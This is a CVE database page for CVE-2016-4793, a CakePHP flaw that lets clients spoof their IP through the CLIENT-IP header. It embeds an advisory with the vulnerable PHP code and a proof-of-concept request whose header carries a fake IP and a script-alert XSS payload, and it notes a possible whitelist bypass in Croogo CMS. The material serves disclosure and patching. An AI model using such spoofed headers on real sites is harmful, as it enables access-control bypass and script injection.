CVE-2016-4793
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
The clientIp function in CakePHP 3.2.4 and earlier allows remote attackers to spoof their IP via the CLIENT-IP HTTP header.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Input Validation The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V3.0 | 7.5 | HIGH |
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
More informations
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. Network A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed 'remotely exploitable' and can be thought of as an attack being exploitable one or more network hops away (e.g. across layer 3 boundaries from routers). Attack Complexity This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability. Low Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. None The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack. User Interaction This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component. None The vulnerable system can be exploited without interaction from any user. Base: Scope MetricsAn important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges. Scope Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports. Unchanged An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same. Base: Impact MetricsThe Impact metrics refer to the properties of the impacted component. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. None There is no loss of confidentiality within the impacted component. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. High There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. None There is no impact to availability within the impacted component. Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability. Environmental Metrics |
nvd@nist.gov |
| V2 | 5 | AV:N/AC:L/Au:N/C:N/I:P/A:N | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 39813
Publication date : 2016-05-15 22h00 +00:00
Author : Dawid Golunski
EDB Verified : No
=============================================
- Release date: 12.05.2016
- Discovered by: Dawid Golunski
- Severity: Medium
=============================================
I. VULNERABILITY
-------------------------
CakePHP Framework <= 3.2.4 IP Spoofing Vulnerability
3.1.11
2.8.1
2.7.10
2.6.12
II. BACKGROUND
-------------------------
- CakePHP Framework
http://cakephp.org/
"CakePHP makes building web applications simpler, faster and require less code.
CakePHP is a modern PHP 5.4+ framework with a flexible Database access layer
and a powerful scaffolding system that makes building both small and complex
systems a breeze. "
III. INTRODUCTION
-------------------------
CakePHP Framework contains a vulnerability that allows to spoof the source IP
address. This can allow to bypass access control lists, or injection of
malicious data which, if treated as sanitized by an unaware CakePHP-based
application, can lead to other vulnerabilities such as SQL injection, XSS,
command injection etc.
IV. DESCRIPTION
-------------------------
Both branches of CakePHP Framework (2.x, 3.x) contain a clientIp() method that
allows to obtain the IP address of a client accessing a CakePHP-based
application. The is slightly different in each branch:
CakePHP 2.x:
------[ Cake/Network/CakeRequest.php ]------
public function clientIp($safe = true) {
if (!$safe && env('HTTP_X_FORWARDED_FOR')) {
$ipaddr = preg_replace('/(?:,.*)/', '', env('HTTP_X_FORWARDED_FOR'));
} else {
if (env('HTTP_CLIENT_IP')) {
$ipaddr = env('HTTP_CLIENT_IP');
} else {
$ipaddr = env('REMOTE_ADDR');
}
}
if (env('HTTP_CLIENTADDRESS')) {
$tmpipaddr = env('HTTP_CLIENTADDRESS');
if (!empty($tmpipaddr)) {
$ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr);
}
}
return trim($ipaddr);
}
--------------------------------------------
CakePHP 3.x:
------[ cakephp/src/Network/Request.php ]------
/**
* Get the IP the client is using, or says they are using.
*
* @return string The client IP.
*/
public function clientIp()
{
if ($this->trustProxy && $this->env('HTTP_X_FORWARDED_FOR')) {
$ipaddr = preg_replace('/(?:,.*)/', '', $this->env('HTTP_X_FORWARDED_FOR'));
} else {
if ($this->env('HTTP_CLIENT_IP')) {
$ipaddr = $this->env('HTTP_CLIENT_IP');
} else {
$ipaddr = $this->env('REMOTE_ADDR');
}
}
if ($this->env('HTTP_CLIENTADDRESS')) {
$tmpipaddr = $this->env('HTTP_CLIENTADDRESS');
if (!empty($tmpipaddr)) {
$ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr);
}
}
return trim($ipaddr);
}
--------------------------------------------
Both of the methods contain the same vulnerability. Despite the safe flag
(CakePHP 2.x), and trustyProxy flag (CakePHP 3.x) set to off by default, they
both use HTTP_CLIENT_IP request header (if it exists) instead of the
REMOTE_ADDR variable set by the web server.
The HTTP_CLIENT_IP header can easily be spoofed by sending CLIENT-IP header
in a HTTP request.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
A) Simple PoC
Download a vulnerable version of CakePHP framework and edit
src/Template/Pages/home.ctp to include the PoC code below
which echoes the visitor's IP using the clientIp() method:
-------[ src/Template/Pages/home.ctp ]--------
<?php
[...]
use Cake\Cache\Cache;
use Cake\Core\Configure;
use Cake\Datasource\ConnectionManager;
use Cake\Error\Debugger;
use Cake\Network\Exception\NotFoundException;
$this->layout = false;
if (!Configure::read('debug')):
throw new NotFoundException();
endif;
$cakeDescription = 'CakePHP: the rapid development php framework';
echo "PoC \n<br> Your IP is: [". $this->request->clientIp() ."]\n\n<br><br>";
[...]
?>
----------------------------------------------
If we send the following request with CLIENT-IP header containing an arbitrary
IP and malicious XSS data:
GET /cake/cake3/ HTTP/1.1
Host: centos
CLIENT-IP: 100.200.300.400 <script>alert('poc');</script>
Content-Length: 2
the application will give the following response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
PoC
<br> Your IP is: [100.200.300.400 <script>alert('poc');</script>]
[...]
As we can see the clientIp() method returns the fake IP and XSS payload
from CLIENT-IP header.
B) Croogo CMS exploit
An example application vulnerable to this bug is Croogo CMS:
https://croogo.org/
"Croogo is a free, open source, content management system for PHP,
released under The MIT License. It is powered by CakePHP MVC framework.
It was first released on October 07, 2009"
In one of its scripts we can find the isWhitelistedRequest() which
takes care of ACLs:
-------[ Vendor/croogo/croogo/Croogo/Lib/CroogoRouter.php ]--------
/**
* Check wether request is from a whitelisted IP address
*
* @see CakeRequest::addDetector()
* @param $request CakeRequest Request object
* @return boolean True when request is from a whitelisted IP Address
*/
public static function isWhitelistedRequest(CakeRequest $request) {
if (!$request) {
return false;
}
$clientIp = $request->clientIp();
$whitelist = array_map(
'trim',
(array)explode(',', Configure::read('Site.ipWhitelist'))
);
return in_array($clientIp, $whitelist);
}
-------------------------------------------------------------------
As we can see, it uses the affected clientIp() function from CakePHP framework.
VI. BUSINESS IMPACT
-------------------------
This vulnerability could be used to bypass access control lists to get
access to sensitive data, or lead to higher severity vulnerabilities
if untrusted data returned by clientIp() method is treated as safe and used
without appropriate sanitization within SQL queries, system command calls etc.
VII. SYSTEMS AFFECTED
-------------------------
According to the vendor, the following versions of CakePHP framework should be
affected by this issue.
3.1.11
3.2.4
2.8.1
2.7.10
2.6.12
VIII. SOLUTION
-------------------------
The vendor has released patched versions.
Install the latest version from the link below.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/CakePHP-IP-Spoofing-Vulnerability.txt
Vendor security CakePHP releases:
http://bakery.cakephp.org/2016/03/13/cakephp_2613_2711_282_3017_3112_325_released.html
http://book.cakephp.org/3.0/en/controllers/request-response.html#working-with-http-methods-headers
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
12.05.2016 - Final advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
Products Mentioned
Configuraton 0
Cakephp>>Cakephp >> Version To (including) 3.2.4
- Cakephp>>Cakephp >> Version 1.0.1.2708 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.1.3.2967 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.1.4.3104 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.1.5.3148 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.1.6.3264 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.1.7.3363 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.1.8.3544 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.7 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.7 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.8 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.8 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.9 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.9 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.10 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.10 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.11 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.11 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.12 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.2.12 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.7 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.7 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.8 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.8 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.9 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.9 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.10 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.10 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.11 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.11 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.12 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.12 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.13 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.13 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.14 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.14 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.15 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.15 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.16 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.16 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.17 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.17 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.18 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.18 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.19 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.19 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.20 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.20 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.21 (Open CPE detail)
- Cakephp>>Cakephp >> Version 1.3.21 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.0.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.0.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.0.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.0.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.0.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.0.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.1.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.1.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.1.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.1.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.1.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.1.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.1.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.1.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.1.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.1.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.1.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.2.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.2.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.2.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.2.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.2.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.2.0-beta (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.2.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.2.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.2.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.2.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.2.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.2.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.2.7 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.2.8 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.2.9 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.3.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.3.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.3.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.3.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.3.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.3.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.3.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.3.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.3.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.3.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.3.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.3.7 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.3.8 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.3.9 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.3.10 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.4.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.4.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.4.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.4.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.4.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.4.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.4.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.4.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.4.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.4.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.4.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.4.7 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.4.8 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.4.9 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.4.10 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.5.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.5.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.5.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.5.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.5.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.5.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.5.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.5.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.5.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.5.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.5.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.5.7 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.5.8 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.5.9 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.7 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.8 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.9 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.10 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.11 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.12 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.6.13 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.7.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.7.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.7.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.7.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.7.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.7.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.7.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.7.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.7.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.7.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.7.7 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.7.8 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.7.9 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.7.10 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.7.11 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.8.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.8.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.8.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.8.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.8.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.8.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.8.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.8.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.8.7 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.8.8 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.8.9 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.9.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.9.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.9.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.9.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.9.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.9.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.9.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.9.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.9.7 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.9.8 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.9.9 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.7 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.8 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.9 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.10 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.11 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.12 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.13 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.14 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.15 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.16 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.17 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.18 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.19 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.20 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.21 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.22 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.23 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.10.24 (Open CPE detail)
- Cakephp>>Cakephp >> Version 2.16.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.7 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.8 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.9 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.10 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.11 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.12 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.13 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.14 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.15 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.16 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.17 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.18 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.0.19 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.1 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.4 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.5 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.6 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.7 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.8 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.9 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.10 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.11 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.12 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.13 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.1.14 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.2.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.2.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.2.0 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.2.1 (Open CPE detail)
